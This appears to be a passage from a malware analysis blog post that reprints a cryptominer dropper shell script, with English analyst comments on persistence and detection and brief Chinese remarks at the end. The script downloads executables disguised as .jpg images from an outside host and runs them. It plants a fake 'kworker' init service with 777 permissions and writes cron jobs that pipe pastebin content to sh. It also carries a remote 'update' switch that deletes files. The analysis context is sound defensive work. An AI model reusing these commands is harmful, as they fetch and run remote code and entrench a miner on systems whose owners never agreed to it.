if [ ${pm} -eq 0 ]; then
if [ ! -f "/bin/config.json" ]; then
curl -fsSL --connect-timeout 120 http://thyrsi.com/t6/358/1534496022x-1404764583.jpg -o /bin/config.json && chmod +x /bin/config.json
if [ ! -f "/bin/config.json" ]; then
wget http://thyrsi.com/t6/358/1534496022x-1404764583.jpg -O /bin/config.json && chmod +x /bin/config.json
fi
fi
if [ ! -f "/bin/kworkerds" ]; then
curl -fsSL --connect-timeout 120 http://thyrsi.com/t6/358/1534491798x-1404764420.jpg -o /bin/kworkerds && chmod +x /bin/kworkerds
if [ ! -f "/bin/kworkerds" ]; then
wget http://thyrsi.com/t6/358/1534491798x-1404764420.jpg -O /bin/kworkerds && chmod +x /bin/kworkerds
fi
nohup /bin/kworkerds >/dev/null 2>&1 &
else
nohup /bin/kworkerds >/dev/null 2>&1 &
fi
fi
}

#######################################
# init — boot-time persistence, not present in the first script. Drops
# /usr/sbin/kworker and a SysV init script /etc/init.d/kworker (both served
# as .jpg from the image host; their contents are not shown on this page),
# makes them world-writable/executable (777), and registers the service with
# chkconfig (RHEL/CentOS-style). Detection: an init.d service named like a
# kernel thread, and `chkconfig --list` / rc*.d links for "kworker".
#######################################
function init() {
if [ ! -f "/usr/sbin/kworker" ]; then
curl -fsSL --connect-timeout 120 http://thyrsi.com/t6/362/1535175015x-1404817880.jpg -o /usr/sbin/kworker && chmod 777 /usr/sbin/kworker
if [ ! -f "/usr/sbin/kworker" ]; then
wget http://thyrsi.com/t6/362/1535175015x-1404817880.jpg -O /usr/sbin/kworker && chmod 777 /usr/sbin/kworker
fi
fi
if [ ! -f "/etc/init.d/kworker" ]; then
curl -fsSL --connect-timeout 120 http://thyrsi.com/t6/362/1535175343x-1566657675.jpg -o /etc/init.d/kworker && chmod 777 /etc/init.d/kworker
if [ ! -f "/etc/init.d/kworker" ]; then
wget http://thyrsi.com/t6/362/1535175343x-1566657675.jpg -O /etc/init.d/kworker && chmod 777 /etc/init.d/kworker
fi
fi
chkconfig --add kworker
}

#######################################
# echocron (httpdns variant) — same three cron locations as the first
# script, but the /etc/cron.d entry omits `-fsSL` and the chmod on curl, and
# there is no timestomping pass here. Schedules: every 10 min, every 30 min,
# and every minute of every 10th hour (`* */10 * * *`).
#######################################
function echocron() {
echo -e "*/10 * * * * root /usr/bin/curl https://pastebin.com/raw/xbY7p5Tb|sh\n##" >/etc/cron.d/root
echo -e "*/30 * * * * /usr/bin/curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh\n##" >/var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo -e "* */10 * * * /usr/bin/curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh\n##" >/var/spool/cron/crontabs/root
}

# Entry point of the httpdns script. Same remote "update" switch as the first
# script; otherwise deploy the miner, install boot persistence (init), refresh
# cron, and after 10 s fall back to the /bin variant if no pool connection is
# seen. Note the shebang is #!/bin/sh yet every function uses the `function`
# keyword, a bashism: on a dash-based /bin/sh this file fails to parse, so it
# only works where sh is bash (or bash is invoked explicitly, as the
# curl|base64 -d|/bin/bash one-liner does).
update=$(curl -fsSL --connect-timeout 120 https://pastebin.com/raw/C4ZhQFrH)
if [ ${update}x = "update"x ]; then
rm -rf /tmp/lock* /bin/kworkerds /bin/config.json /tmp/kworkerds /root/kworkerds
echocron
else
downloadrun
init
echocron
sleep 10
port=$(netstat -anp | grep 13531 | wc -l)
if [ ${port} -eq 0 ]; then
downloadrunxm
fi
fi
#
#

这脚本不得不说,真的有毒。

以sh作为解释器,定义函数时却还加上了function关键字。

重命名成httpdns丢到bin目录,还给了执行权限。

在crontab里面增加了定时任务。
